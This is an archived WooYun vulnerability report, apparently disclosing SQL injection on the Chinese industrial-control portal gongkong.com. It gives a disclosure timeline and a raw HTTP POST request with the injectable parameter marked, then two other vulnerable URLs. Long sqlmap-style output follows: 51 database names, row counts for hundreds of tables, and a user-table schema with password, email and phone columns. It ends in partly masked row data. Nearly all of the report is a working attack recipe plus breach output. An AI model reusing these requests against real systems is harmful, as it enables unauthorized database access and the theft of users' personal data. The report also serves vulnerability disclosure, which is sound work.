乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-15: 细节已通知厂商并且等待厂商处理中 2016-03-18: 厂商已经确认,细节仅向厂商公开 2016-03-28: 细节向核心白帽子及相关领域专家公开 2016-04-07: 细节向普通白帽子公开 2016-04-17: 细节向实习白帽子公开 2016-05-02: 细节向公众公开
中国工控网好火,这次和前人找的角度不一样,但同样的感觉,求首页,求20rank
POST /customer/advantech/sq11.asp HTTP/1.1Content-Length: 228Content-Type: application/x-www-form-urlencodedCookie: ASPSESSIONIDCCBADTDC=HCILKDPCFHHGOOAMFMDHCEDNHost: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*psw=1&select=%b0%e5%bf%a8%c0%e0OEM/ODM%b7%fe%ce%f1&tijiao=%cc%e1%bd%bb&usname=aaaa*&xq=1
http://**.**.**.**/customer/advantech/embed.asp?key=SOM
http://**.**.**.**/customer/advantech/download.asp?keyword=%E5%B7%A5%E6%8E%A7%E6%9C%BA
available databases [51]:[*] ABB[*] agongkong[*] ase_050124[*] caa[*] cfpmia[*] cus_2010_for_bb[*] cus_abb[*] cus_abb_BC[*] custom[*] custom_1[*] forzdao[*] GkCrm[*] gkmall[*] gknetdatanew[*] gkoa[*] gkreguser[*] gkstat[*] GkStudy[*] gkstudynet[*] gksystem[*] gongkong[*] gongkongcorp[*] GongKongNet[*] inquire[*] kpi2012[*] LouKong[*] master[*] model[*] msdb[*] NBBS[*] NDic[*] NMessage[*] NReguser[*] NRegUserDynamic[*] NSys[*] NSysLog[*] nweblog[*] opc_2009[*] peCms[*] Photography[*] ReportServer[*] ReportServerTempDB[*] SchneiderBBS[*] siemensEl[*] siemensQuiz[*] tempdb[*] wap2011[*] wapsubscribe[*] xiugongkong[*] xuegongkong[*] youjiang
Database: gongkongnet+----------------------------------------+---------+| Table | Entries |+----------------------------------------+---------+| dbo.WVisit | 30162070 || dbo.RecordIP | 17396251 || dbo.InfoPublicationLog | 15455349 || dbo.BaseProductModelParameter | 9287436 || dbo.MPRuleHistory | 4584307 || dbo.DownloadDetail | 3835223 || dbo.RegUserView | 3353115 || dbo._temp_Stock4Custom_all | 3112420 || dbo.ForumReplyUserView | 2865331 || dbo.BADViewHistory | 2697192 || dbo.Message | 2593563 || dbo.CoAdAssoViewHistory | 2508874 || dbo.special_magazine_info_access | 2180205 || dbo.RegUserMemberInfo | 2104125 || dbo.regusermemberinfoPointValueYearBak | 2089084 || dbo.RegUserPointvalue | 1780304 || dbo.UserHistory | 1289783 || dbo.CommonAuditTrace | 1233675 || dbo.MPExchangeDetail | 1134628 || dbo.SearchKeyWords | 1044812 || dbo.tb_index | 1042079 || dbo.MmsOrder | 928286 || dbo.smsOrder | 927693 || dbo.V_Product_IndustryTech | 878915 || dbo.ProductIndustry | 878635 || dbo.RegUserActivation | 782068 || dbo.BizTrades | 741197 || dbo.HrPositionCompanyProductView | 679729 || dbo.CompanyAsso | 670801 || dbo.BizTradeProductTypeBrandView | 581081 || dbo.QuestVote | 565218 || dbo.temp_index | 510302 || dbo.ViewForumTopicPink | 488790 || dbo.ForumTopicsByGategory | 488768 || dbo._temp_ProductModel4Custom_all | 475602 || dbo.v_Forum_List | 464263 || dbo.CommonFeedback | 443200 || dbo.BizSaleSelectedModel | 433615 || dbo.ViewBizSaleModel | 428988 || dbo.IpDataBase | 417423 || dbo.CommonFeedBackUserView | 405108 || dbo.IpAddress | 357178 || dbo.TempIndustryProducts | 347001 || dbo.ViewTmpBbs | 342218 || dbo.ComContMutuality | 330367 || dbo.OnlineProsemQuestion | 308889 || dbo.HrReceiptResume | 265450 || dbo.ViewHrPositionResume | 265450 || dbo.ViewHrUserResume | 265450 || dbo.BaseProductModel | 260903 || dbo.BaseProductModelView | 260903 || dbo.HomeUserClickRecord | 253864 || dbo.BaseProductModel3 | 248096 || dbo.Photo | 244569 || dbo.ProductsByIProductTypeViews | 241597 || dbo.BaseIProductTypeProductViews | 241006 || dbo.CompanyProductTypeIdView | 211556 || dbo.ViewNewsSolutionDatumTutorial | 196842 || dbo.RegUserVisitHistory | 196126 || dbo.IndustryChannelIndustryNewsView | 191583 || dbo.TempIndustryCompany | 190784 || dbo._bak4City | 182714 || dbo.TechArticleIndustry | 178308 || dbo._bak4Category | 176725 || dbo.ViewTechArticleIndustry | 176646 || dbo.RegUserFavorite | 174096 || dbo._bak4Intent | 163031 || dbo.BizSalesProdutType | 162029 || dbo.ProductProductType | 161109 || dbo.ProductsByProductTypeView | 159652 || dbo.V_TechArticle_IndustryTech | 158801 || dbo.ViewProductsByMinPcode | 157910 || dbo.ViewProductsByMin | 156775 || dbo.ViewProductsByMidPcode | 156452 || dbo.V_Product_PRunPType | 156202 || dbo.ViewProductsByMid | 155317 || dbo.V_BizSales_PRunPType | 152804 || dbo.OnlineLogins | 149393 || dbo.WInfo | 145529 || dbo.CommonFeedbackStat | 144611 || dbo.CompanyProductyType | 143719 || dbo.ViewCompanyIDByMinPcode | 141632 || dbo.ViewCompanysByMinPcode | 141603 || dbo.ViewCompanyIDByMidPcode | 140665 || dbo.ViewCompanysByMidPcode | 140636 || dbo.RegUserFriend | 138368 || dbo.V_Company_PRunPType | 137827 || dbo.ViewCompanyCtypePtype | 137777 || dbo.NewsProductType | 137251 || dbo.V_News_PRunPType | 136735 || dbo.V_News_IndustryTech | 135954 || dbo.NewsIndustry | 134103 || dbo.ViewHYTJNews | 134103 || dbo._temp_Price4Custom_all | 133644 || dbo.BaseProductModel2 | 132815 || dbo.SlcStatic | 130849 || dbo.V_Datum_PRunPType | 124490 || dbo.DatumProdutType | 124300 || dbo.DatumProductTypeView | 124298 || dbo.CompanyMenu | 123661 || dbo.ViewTechnicCommend | 120461 || dbo.NewsByProductTypeView | 116402 || dbo.ViewNewsByPtype | 115990 || dbo.ViewNewsIdByPtype | 115990 || dbo.DatumFreeReguser | 111432 || dbo.RegUserGroupMember | 110873 || dbo.researchVisit | 108867 || dbo.HrUserBase | 107650 || dbo.ViewHrUserInfo | 107650 || dbo.V_TechArticle_PRunPType | 106176 || dbo.TechArticleProductType | 104950 || dbo.ViewDatumByPtype | 104404 || dbo.ViewDatumIdByPtype | 104404 || dbo.HrUserIntent | 103745 || dbo.ViewProductByMaxPtype | 103416 || dbo.ViewProductIdByMaxPtype | 103416 || dbo.BizSalesProductTypeView | 101703 || dbo.V_Datum_IndustryTech | 101558 || dbo.ViewProductsByMaxPcode | 101465 || dbo.DatumIndustry | 100880 || dbo.ViewProductsByMax | 100608 || dbo.ViewCompanyIDByMaxPcode | 99994 || dbo.ViewCompanysByMaxPcode | 99979 || dbo.RegUserIndustry | 96509 || dbo.News | 93034 || dbo.ViewCompanyIdByPtype | 91908 || dbo.ViewCompanyByPtype | 91895 || dbo.ViewSaleModel | 91152 || dbo.Product | 89566 || dbo.ProductProductCustomType | 88075 || dbo.OnlineProsemAnswer | 86608 || dbo.BizSaleProductTypeView | 85618 || dbo.ForumTopic3 | 84601 || dbo.HrUserWorklive | 84540 || dbo.ProseminarRecord | 84513 || dbo.BizSales | 84155 || dbo.PaperIndustry | 83813 || dbo.PaperIndustryView | 83812 || dbo.Datum | 83586 || dbo.RegUserProductType | 82045 || dbo.HrEducation | 81966 || dbo.BlogIndexAction | 81697 || dbo.testProductView | 79542 || dbo.BizSaleProductBrandView | 77788 || dbo.BizResortProductType | 75075 || dbo.V_MarketNews_IndustryTech | 74170 || dbo.MarketNewsIndustry | 74013 || dbo.MarketNewsIndustryView | 74008 || dbo.px_paperIndustry | 73520 || dbo.ViewHYTJPapar | 73520 || dbo.HrUserLanguage | 72405 || dbo.CompanySeller | 68872 || dbo.ForumTopicsBySortView | 65898 || dbo.ViewHYTJBBS | 65842 || dbo.WapMobileHistory | 64675 || dbo.BizResortProductTypeView | 64416 || dbo.HrPositionProductType | 63260 || dbo.TechArticle | 62284 || dbo.ArticeAssoProductType | 60433 || dbo.ProductIdByBrandView | 56743 || dbo.BizResortStock | 56473 || dbo.CompanyCompanyType | 54386 || dbo.CompanyCompanyTypeView | 54373 || dbo.ViewCompanyCompanyType | 54373 || dbo.StatFileLog | 52674 || dbo.MarketNews | 52494 || dbo.Company | 52433 || dbo._bak4work | 51607 || dbo.SolutionIndustry | 50495 || dbo.ViewHYTJSolution | 50177 || dbo.ViewSolutionIndustry | 50177 || dbo.BizOrderDetails | 48130 || dbo.ViewOrderModel | 48130 || dbo.BizOrder | 48108 || dbo.TempConvert | 45761 || dbo.MediaUserSubscibe | 45506 || dbo.CompanyIndustry | 44062 || dbo.QuestUserAnswer | 43808 || dbo.DatumBrandView | 42660 || dbo.TempIproductType | 41655 || dbo.PhotoPhotoContest | 40049 || dbo.PaperProductType | 39379 || dbo.ModelParameter | 39142 || dbo.ChargeInfo | 38088 || dbo.ProductModel | 37800 || dbo.PhotoContest | 34157 || dbo.ArticeAssoIndustry | 33757 || dbo.SysLog | 33752 || dbo.InfoCommendStat | 33686 || dbo.AdvertiseProductType | 32426 || dbo.MPExcuteTemp | 30724 || dbo.SchneiderUser | 30475 || dbo.BaseSeriesProductType | 29418 || dbo.model_bak | 28206 || dbo.ReserReguser | 27795 || dbo.SolutionProductType | 27416 || dbo.OnlineProseminarVideoPPt | 27050 || dbo.CompanysByAccountTypeView | 27004 || dbo.CommonVote | 26978 || dbo.CompanyLayout | 26476 || dbo.HrTrainExp | 26226 || dbo.PayReadHistory | 25225 || dbo.Papers | 24899 || dbo.ViewSolutionIdByPtype | 24657 || dbo.ViewSolutionByPtype | 24523 || dbo.ViewHrPositionCompany | 24488 || dbo.SchneiderUserSolution | 24486 || dbo.BaseParamConst | 24331 || dbo.RegUserBrand | 23126 || dbo._bak4PCategory | 21600 || dbo.CompanyStockServer | 20430 || dbo._temp_Stock4Custom | 20367 || dbo.ClumMember | 20156 || dbo.ViewClubMemberRegUser | 20154 || dbo.ViewClubMemberSelect | 20154 || dbo.OnlineLogout | 19917 || dbo.Solutions | 19078 || dbo.HrPosition | 18893 || dbo.DatumProductSeries | 18197 || dbo.HrUserBaseBrand | 18152 || dbo.BookOrderDetails | 17964 || dbo.NewsProductCustomType | 17598 || dbo.KouBei | 17170 || dbo.MPShareHistory | 17057 || dbo.CompanyBrand | 16801 || dbo.ViewHrPositions | 15549 || dbo.ProductCustomType | 15370 || dbo.ExpositionLook | 15075 || dbo.CompanyBrandView | 14692 || dbo.BaseProductSeries | 14520 || dbo.ViewPaperIdByPtype | 14355 || dbo.ViewPaperByPtype | 14328 || dbo.papers_importdata | 13212 || dbo.ExpositionDetails | 13165 || dbo.BizTradesProductSeries | 13157 || dbo.BookOrder | 12935 || dbo.InfoProject | 12918 || dbo.ExpositionDetailsView | 12620 || dbo.PhotoTypeCustomer | 12529 || dbo.gongkongcompany | 12089 || dbo.FaultCode | 12005 || dbo.FaultCode2 | 12005 || dbo.ProseminarProductType | 11869 || dbo.ProseminarProductTypeView | 11860 || dbo.SolutionByIProductTypeView | 11758 || dbo.Repair | 11752 || dbo.TechArticleProductSeries | 11658 || dbo.ProductMutuality | 11328 || dbo.ProseminarProductTypeBrandView | 10932 || dbo.GkgcLog | 10797 || dbo.Test_PhotoPhotoContest | 10681 || dbo.RegUserFriendType | 10674 || dbo.BaseBrandProductTypeGK | 10619 || dbo.InquireRecordUsers | 10537 || dbo.HrUserBaseAssoCompany | 10361 || dbo.QuestOption | 10259 || dbo.ViewHrUserInfoDown | 10144 || dbo.TempIndustrySolutions | 9218 || dbo.BizResortStockProductSeries | 9051 || dbo.BaseParameterType | 8710 || dbo.BaseParameter | 8160 || dbo.webLink | 7970 || dbo.ProjectDocument | 7937 || dbo.ProductModelParameter | 7346 || dbo.ArticleIndustry | 6589 || dbo.ActUser | 6585 || dbo.BPrivilegeBControl | 6522 || dbo.ViewCompanyMemberType | 6511 || dbo.ActUserRole | 6447 || dbo.ViewMemberCompany | 6253 || dbo.ArticeAssoBrand | 5981 || dbo.ViewCompanysAssoUser | 5860 || dbo.ViewCompnayIDAssoUser | 5860 || dbo.BControl | 5730 || dbo.IndustryChannelMKResearchView | 5262 || dbo.ResearchIndustry | 5118 || dbo.Proseminar | 5117 || dbo.CommonChannelCommend | 5084 || dbo.MPExchange | 5078 || dbo.BPrivilegeBPage | 5065 || dbo.ReportError | 5059 || dbo.ViewCompanyMember | 5058 || dbo.CommunityVisit | 5045 || dbo.xp_user | 4987 || dbo.ResearchNewsIndexAction | 4976 || dbo.CommendProductPtypeView | 4741 || dbo.TutorialIndustry | 4659 || dbo.NewsProductSeries | 4542 || dbo.HrProjectExp | 4376 || dbo.BTag | 4373 || dbo.ArticleProductType | 4283 || dbo.DatumDatumCustomerType | 4185 || dbo.HrUserIndexAction | 4076 || dbo.MpHistoryMpExchange | 4054 || dbo.HrSpecialSkill | 3968 || dbo.DerlingCeaiHistory | 3926 || dbo.BaseParameterTmp | 3870 || dbo.MediaUserContribute | 3839 || dbo.BADVisitHistory | 3771 || dbo.ParameterOption | 3599 || dbo.BRoleBPrivilege | 3568 || dbo.yeneihezuo_user | 3450 || dbo.BPrivilege | 3367 || dbo.MyCardCase | 3344 || dbo.TutorialDetails | 3339 || dbo.RegUserIntel | 3199 || dbo.OAFeedback | 3164 || dbo.CommendProductPcode | 3157 || dbo.BrandAssoProduct | 3120 || dbo.Advertise | 3110 || dbo.InfoPublication | 3104 || dbo.BaseBrandProductTypeXiu2 | 3062 || dbo.Question | 2913 || dbo.english_news | 2901 || dbo.HrUserResumeAccessory | 2864 || dbo.VideoTypeCustomer | 2738 || dbo.lunwen_user | 2682 || dbo.BaseBrandProductType | 2679 || dbo.TechArticleProductionRun | 2656 || dbo.ViewHwwzIndustry | 2643 || dbo.View_HwwzBaseIndustry | 2617 || dbo.HrCompanyFavorite | 2514 || dbo.exam_user | 2498 || dbo.BaseBrandProductTypeView | 2409 || dbo.CommendProductView | 2357 || dbo.CompanyStockServerSub | 2349 || dbo.videoCode | 2314 || dbo.OnlineSurveryHistory | 2313 || dbo.news_user | 2287 || dbo.BaseBrandProductTypeXiu | 2238 || dbo.UserContributions | 2222 || dbo.SendMMsHistory | 2154 || dbo.Article | 2148 || dbo.OnlineProsemUser | 2130 || dbo.AdSubjectContent | 2123 || dbo.MediaPaper | 2102 || dbo.TutorialProductType | 2023 || dbo.ContentScoreDetails | 2021 || dbo.MpCashExchange | 1989 || dbo.NewsTechType | 1977 || dbo.bz_user | 1972 || dbo.BPage | 1964 || dbo.ActUserHr | 1943 || dbo.HrManageExp | 1892 || dbo.CustomServicers | 1886 || dbo.CustomServicersView | 1886 || dbo.BookHistory | 1861 || dbo.AdvertiseSiteColumnPageArea | 1829 || dbo.BaseBrand | 1817 || dbo.CoAdAssoHitHistory | 1811 || dbo.CommonAccessTrace | 1790 || dbo.ActPermissionResource | 1765 || dbo.V_MarketNews_PRunPType | 1757 || dbo.jszc_user | 1746 || dbo.BizCooperateProductType | 1729 || dbo.BizCooperateProductTypeBrandView | 1729 || dbo.KeyWordFilter | 1710 || dbo.OAMessage | 1675 || dbo.ProductProductionRun | 1671 || dbo.CompanyEmployees | 1608 || dbo.pxblog_user | 1607 || dbo.BizMro | 1576 || dbo.WapMobibleUserInfo | 1562 || dbo.BookInAndOut | 1548 || dbo.InfoMemberAttemp | 1533 || dbo.OAGiftHistory | 1510 || dbo.ViewAdRoleCompanys | 1495 || dbo.ResearchProductType | 1487 || dbo.RepairAccessory | 1401 || dbo.BaseExcel | 1366 || dbo.Books | 1336 || dbo.DatumProductionRun | 1328 || dbo.MarketNewsProductType | 1322 || dbo.MarketNewsProductTypeViews | 1322 || dbo.Exposition | 1284 || dbo.newuserEnglish | 1201 || dbo.SolicitarticleFeedback | 1189 || dbo.TutorialDir | 1144 || dbo.HRSurvey | 1059 || dbo.solutionProductCustomType | 1041 || dbo.OnlineProsemSurvey | 1035 || dbo.VideoVideoType | 1008 || dbo.Video | 1000 || dbo.BaseIProductTypeAssc | 988 || dbo.BaseIProductTypeViews | 988 || dbo.OnlineProsemIndustry | 945 || dbo.BookGathering | 941 || dbo.VideoFeedback | 912 || dbo.MediaNews | 900 || dbo.EquipmentPurchase | 885 || dbo.CompanyContact | 883 || dbo.CompanyFocus | 874 || dbo.Attestation | 867 || dbo.datumimportdata | 841 || dbo.ExcelUploadFiles | 838 || dbo.BaseProductType | 835 || dbo.ViewProductType | 835 || dbo.BookProductType | 825 || dbo.ViewAdCompanys | 823 || dbo.VideoIndustry | 795 || dbo.ViewXlsCompanySaleModel | 792 || dbo.CompanyMember | 780 || dbo.MediaCatalog | 768 || dbo.TechArticleTechType | 765 || dbo.FactoryCompanyIndustry | 733 || dbo.IRegUserConfig | 717 || dbo.AskerOline | 702 || dbo.OnlineProsemProductType | 686 || dbo.BaseProductType_Temp | 681 || dbo.CompanyCommend | 678 || dbo.DatumTechType | 678 || dbo.RegUserAccountInfo | 651 || dbo.CompanyPartSettings | 650 || dbo.ViewResearchNewsRpt | 633 || dbo.BizCooperate | 632 || dbo.ForumPurviewView | 631 || dbo.MemberPurview | 631 || dbo.GKCreditApp | 629 || dbo.ResearchReport | 621 || dbo.px_2008_list | 583 || dbo.Questionnaire | 578 || dbo.NewsProductionRun | 572 || dbo.VideoProductType | 570 || dbo.AdvBooking | 531 || dbo.ForumGategory_Temp | 531 || dbo.CompanyBanner | 530 || dbo.ProductDocumentProductType | 530 || dbo.ProjectDocumentProductType | 528 || dbo.ActControlResource | 514 || dbo.RegUserExtend | 501 || dbo.ElementDynamic | 500 || dbo.BaseProductType_Bak | 498 || dbo.datumTypeCustomer | 494 || dbo.SolicitArticlesProductType | 488 || dbo.OnlineProseminar | 486 || dbo.Cases | 483 || dbo.OnlineProsemCompany | 483 || dbo.InfoCommend | 477 || dbo.MarketNewsProductionRun | 472 || dbo.CompanyLink | 458 || dbo.ExpositionCompany | 450 || dbo.BMenu | 447 || dbo.BPrivilegeBMenu | 447 || dbo.BaseBrandProductTypeXiu1 | 436 || dbo.IRegUserMessage | 436 || dbo.exam_list | 431 || dbo.OnlineProseminarMPHistory | 431 || dbo.BaseArea | 429 || dbo.PhotoWinPrize | 424 || dbo.lunwen_list | 420 || dbo.AdvertiseApply | 405 || dbo.BaseProductTypeXiu | 381 || dbo.TempIproductTypePtype | 378 || dbo.MemberAdmin | 376 || dbo.FactoryCompany | 359 || dbo.ProductAheadNote | 359 || dbo.HrInterviewingInform | 349 || dbo.MPRuleHistoryTemp | 341 || dbo.CompanyProductionRun | 335 || dbo.RegUserCommunityInfo | 332 || dbo.ViewHwwzPcode | 323 || dbo.HrManagerNewsFeedback | 321 || dbo.CommunityUser | 309 || dbo.Product_Del | 300 || dbo.GongkongMP10 | 296 || dbo.news_en | 286 || dbo.ProductDocument | 284 || dbo.BaseIndustry | 280 || dbo.ProductTechType | 280 || dbo.ActUserExpo | 276 || dbo.RegUserAppCom | 262 || dbo.BAreaAdvertiseAsso | 252 || dbo.HrNews | 252 || dbo.AbroadArticleView | 248 || dbo.SendHistory | 248 || dbo.FactoryCompanyType | 247 || dbo.CompanySpecial | 238 || dbo.MPRule | 238 || dbo.ProseminarTechType | 238 || dbo.HrSubscibe | 236 || dbo.ExpositionJoin | 234 || dbo.GongKongNewsView | 232 || dbo.ActUserBRole | 227 || dbo.OAGiftPicture | 216 || dbo.english_weekly | 215 || dbo.BookAmount | 213 || dbo.CompanyCustomize | 213 || dbo.SolicitarticleComeView | 210 || dbo.SolicitArticles | 210 || dbo.MarketNewsTechType | 204 || dbo.OAGift | 187 || dbo.HrHunterPositionView | 181 || dbo.NewsAssoSocial | 181 || dbo.BizSalesProductionRun | 174 || dbo.ClubPayment | 174 || dbo.IRegUserFavorite | 174 || dbo.ViewClubPaymentUser | 174 || dbo.BaseProductTypeProductTypeXiu | 172 || dbo.BaseIProductType | 156 || dbo.FactoryCompanyProductyType | 156 || dbo.xp_list | 156 || dbo.DerlingCeai | 143 || dbo.CoSiteCoHotMessage | 140 || dbo.BAdvertise | 134 || dbo.ResearchNews | 132 || dbo.CoAdAsso | 130 || dbo.BookOosNote | 125 || dbo.CommonSubject | 125 || dbo.MmsMessage | 119 || dbo.RegUserGroup | 118 || dbo.BArea | 116 || dbo.FaultCodeBack | 115 || dbo.CasesIndustry | 114 || dbo.CompanyPublication | 109 || dbo.jszc_list | 106 || dbo.WapMobileCompany | 105 || dbo.yanjiu | 103 || dbo.HrUserAssoActivity | 102 || dbo.ResearchMessage | 100 || dbo.ViewOnlieProsemCompany | 98 || dbo.hrManagerNews | 94 || dbo.PayOrder | 90 || dbo.BColumnMPRule | 89 || dbo.WComment | 89 || dbo.BEmployee | 87 || dbo.BaseCompanyTypeUserJob | 86 || dbo.InfoProjectIndustry | 86 || dbo.MediaBase | 83 || dbo.InteractiveCommendView | 82 || dbo.ResearchVisitUser | 82 || dbo.ActUserMedia | 81 || dbo.ActRole | 78 || dbo.NewsHr | 76 || dbo.HrPositionType | 75 || dbo.OAServiceHistory | 74 || dbo.MpGiftHistory | 73 || dbo.ViewDynamicResearch | 72 || dbo.DatumFreeReguserHistory | 71 || dbo.News_Del | 71 || dbo.MRReportTypeMRCustomer | 70 || dbo.SolutionTechType | 70 || dbo.ClubMessage | 68 || dbo.OnlineSurveryItem | 67 || dbo.ClubMessageTypeView | 66 || dbo.HRBranches | 66 || dbo.MediaUserAdRequest | 64 || dbo.tempTopic | 63 || dbo.SendMsgTable | 60 || dbo.QuestionnairesBody | 59 || dbo.QuestionnairesHead | 59 || dbo.CompetencyBrand | 55 || dbo.PaperTechType | 55 || dbo.ViewCompanyCompetencyBrand | 55 || dbo.RegUserGroupIndustry | 52 || dbo.CommunityMessage | 51 || dbo.ProductProductParameter | 51 || dbo.Community | 50 || dbo.onlineQTemp | 49 || dbo.BizCooperateIndustry | 48 || dbo.ChannelsServer | 48 || dbo.CustomServicer | 48 || dbo.ErrorTable | 48 || dbo.IRegUserMessageFeedBack | 46 || dbo.MPProject | 46 || dbo.ViewRoleResource | 46 || dbo.CompanyLinkman | 45 || dbo.CommonSubjectPrd | 44 || dbo.dst2q | 44 || dbo.bz_list | 42 || dbo.NonRegUser | 42 || dbo.IMessageConfig | 41 || dbo.yeneihezuo_en | 41 || dbo.CoSite | 40 || dbo.ProseminarLogins | 40 || dbo.SubMpScoreTable | 40 || dbo.InfoProjectProductType | 39 || dbo.OpSqlNote | 38 || dbo.StockCompany | 38 || dbo.Lecturer | 37 || dbo.OAMessageType | 37 || dbo.DatumProdutType_Del | 36 || dbo.BaseEmail | 34 || dbo.RegUserGroupProductType | 32 || dbo.BaseTechType | 30 || dbo.TVFeedback | 30 || dbo.UserJoinTag | 29 || dbo.CompanyComHit | 28 || dbo.HrProductType | 27 || dbo.ProseminarOline | 27 || dbo.UserHelp | 27 || dbo.MRReport | 26 || dbo.ProseminaryNewsAsso | 26 || dbo.HistoryElement | 25 || dbo.InfoProjectBrand | 25 || dbo.InfoProjectReply | 25 || dbo.OnlineSurvery | 25 || dbo.BaseUserJob | 24 || dbo.BQuickLink | 24 || dbo.BModule | 23 || dbo.ElementOperation | 23 || dbo.BRole | 21 || dbo.HrPositionIndexAction | 21 || dbo.OAService | 21 || dbo.CardCase | 20 || dbo.IndexLog | 20 || dbo.news_list | 20 || dbo.OAMessageIndexAction | 20 || dbo.ExpositionIntroType | 19 || dbo.HRReportStat | 19 || dbo.CoHotMessage | 18 || dbo.CompanyOnlineContact | 18 || dbo.HRSurveyCompany | 18 || dbo.PlatQuestion | 18 || dbo.BaseProductionRun | 17 || dbo.TechArticleType | 17 || dbo.BColumn | 16 || dbo.PhotoWinPrizeResult | 16 || dbo.ProjectDocumentIndustry | 16 || dbo.BPrivilegeBProject | 15 || dbo.IRegUserOnline | 15 || dbo.newsType | 15 || dbo.prosemtmp | 15 || dbo.BProject | 14 || dbo.AdReservation | 13 || dbo.BaseProductTypeParameter | 13 || dbo.IConfig | 13 || dbo.IMessage | 13 || dbo.QuestionnaireIndexAction | 13 || dbo.BizCooperateProductSeries | 12 || dbo.Bookconcern | 12 || dbo.BaseCompanyType | 11 || dbo.CompanyCompanySection | 11 || dbo.CompanyHrColumn | 11 || dbo.WuliuProductModel | 11 || dbo.ActPermission | 10 || dbo.BDepartment | 10 || dbo.ClubMessageType | 10 || dbo.DatumType | 10 || dbo.MPRuleType | 10 || dbo.MRReportType | 10 || dbo.NewsSocialType | 10 || dbo.WuliuModelParameters | 10 || dbo.DatumIndustry_Del | 9 || dbo.ExtWebUserBind | 9 || dbo.solutionsArtBak | 9 || dbo.BaseRegion | 8 || dbo.CompanyType | 8 || dbo.Datum_Del | 8 || dbo.HREducational | 8 || dbo.HRWorkYear | 8 || dbo.PaperType | 8 || dbo.ResearchNewsType | 8 || dbo.StockType | 8 || dbo.BizSales_Del | 7 || dbo.BizTrades_Del | 7 || dbo.CommonMutuality | 7 || dbo.MRCustomer | 7 || dbo.smsType | 7 || dbo.UserLoginInfo | 7 || dbo.english_feedback | 6 || dbo.HrUserIndexUpdate | 6 || dbo.OAGiftType | 6 || dbo.ProseminarIndustry | 6 || dbo.ProseminarType | 6 || dbo.RegUserGroupType | 6 || dbo.Setting | 6 || dbo.ActRoleGroup | 5 || dbo.BizCooperateType | 5 || dbo.Competency | 5 || dbo.HrHunter | 5 || dbo.OnlineDemoQuestion | 5 || dbo.ProductCustomTypeBaseProductType | 5 || dbo.RecvMsgTable | 5 || dbo.TutoriaType | 5 || dbo.v_Forum_List3 | 5 || dbo.ActRolePermission | 4 || dbo.ArticleType | 4 || dbo.BSite | 4 || dbo.ExpositionType | 4 || dbo.MessageType | 4 || dbo.OnlineProsemSubject | 4 || dbo.PayType | 4 || dbo.TechArticle_Del | 4 || dbo.BizTradesType | 3 || dbo.BookIndexAction | 3 || dbo.BookWarehouse | 3 || dbo.CompanyDomainName | 3 || dbo.CompanyRepair | 3 || dbo.CoTemplatePage | 3 || dbo.HrNewsType | 3 || dbo.MediaNewsType | 3 || dbo.ProductDocumentIndustry | 3 || dbo.ProductTypeBrandRel | 3 || dbo.ResearchReportType | 3 || dbo.s_advertising | 3 || dbo._temp_ProductModel4Custom | 2 || dbo.AdvertiseBrand | 2 || dbo.AdvOpenSetting | 2 || dbo.CommunityType | 2 || dbo.CompanyUsers | 2 || dbo.CoTemplateArea | 2 || dbo.HrAdactivity | 2 || dbo.MmsType | 2 || dbo.MPWarningSet | 2 || dbo.ProductBidding | 2 || dbo.SolutionType | 2 || dbo.sysfile1 | 2 || dbo.BizTradesIndexAction | 1 || dbo.BPriceKeyword | 1 || dbo.CommonMisspellings | 1 || dbo.CommonSubjectInd | 1 || dbo.CompanyIndexAction | 1 || dbo.CompanySection | 1 || dbo.CoTemplate | 1 || dbo.DatumIndexAction | 1 || dbo.InfoPublicationFeedback | 1 || dbo.IpForumFrequency | 1 || dbo.MediaPaperType | 1 || dbo.OnlineCurrentProseminar | 1 || dbo.paperPrize | 1 || dbo.PhotoContestPage | 1 || dbo.ProseminarIndexAction | 1 || dbo.RegUserOnline | 1 || dbo.tv_visiter | 1 || dbo.UserForumFrequency | 1 || dbo.videoVoice | 1 || dbo.ViewForumAdmin | 1 || dbo.ViewUnid | 1 || dbo.WapAd | 1 || dbo.WapCompany | 1 |+----------------------------------------+---------+
Database: gongkongnetTable: RegUserView[72 columns]+----------------------+----------+| Column | Type |+----------------------+----------+| active | int || actUserId | char || address | nvarchar || answer | nvarchar || biddingType | char || classday | nvarchar || comCreatDate | datetime || Comment | varchar || companyName | nvarchar || companyUrl | nvarchar || customSettings | nvarchar || disableBizTrade | char || disableForum | char || distributeRate | decimal || email | nvarchar || emailAlertTime | datetime || fax | nvarchar || feedbacktrashnum | int || flag | char || handset | nvarchar || height | nvarchar || id | char || industryBound | nvarchar || industryCode | bigint || interest | nvarchar || interestCode | bigint || isAcceptSMS | int || IsAdded | int || isAddressValidation | int || isCardIdValidation | int || isemail | int || isEmailAlert | char || isExpert | int || isFaxValidation | int || isJoinMp | int || ismobile | int || isPhoneValidation | int || isTrueNameValidation | int || isUsefulAddress | char || isUsefulEMail | bit || isUsefulPhone | char || isUsefulUserInfo | char || job | nvarchar || jobdgree | nvarchar || joinFrom | nvarchar || joinMPTime | datetime || joinTime | datetime || lastLogin | datetime || lastTime | datetime || loginName | nvarchar || loginPoint | int || market | nvarchar || oldcode | int || organization | nvarchar || ownership | nvarchar || panman | nvarchar || password | nvarchar || persons | nvarchar || phone | nvarchar || postalcode | nvarchar || productTypeBound | nvarchar || province | nvarchar || question | nvarchar || sex | char || status | char || trueName | nvarchar || turnover | nvarchar || updateDate | datetime || userType | nvarchar || validLevel | int || vipRequest | char || workday | nvarchar |+----------------------+----------+
*****----------+----********** **********----+-------********** | ********** | liu********** ********** | 23********** | ********** | 镇^********** ********** ********** ********** | ********** ********** ********** | ********** ********** ********** ********** | ********** ********** ********** **********9 ********** ********** | 抓住********** | ********** ********** | ********** | ********** ********** ********** ********** ********** | 好想********** ********** ********** ********** | hu********** ********** ********** | ********** ********** ********** ********** ********** | ********** ********** | ********** ********** ********** |********** ********** | ^********** **********4567890-= |********** | ********** | con********** | ********** ********** | ********** | ********** | ********** | 全********** ********** | ********** ********** | ********** | ********** | ********** ********** ********** | ********** | **********6297 ********** | ********** ********** **********5 ********** | ********** | ^********** ********** | 正在********** ********** ********** ********** | ********** ********** ********** ********** | ********** ********** | ********** | ********** ********** | ********** | ********** ********** ********** | ********** ********** | ********** ********** | zhe********** | ********** ********** | zi********** ********** | ********** | ********** | ********** | ********** ********** | ********** ********** | ********** | 小子********** ********** | ********** ********** 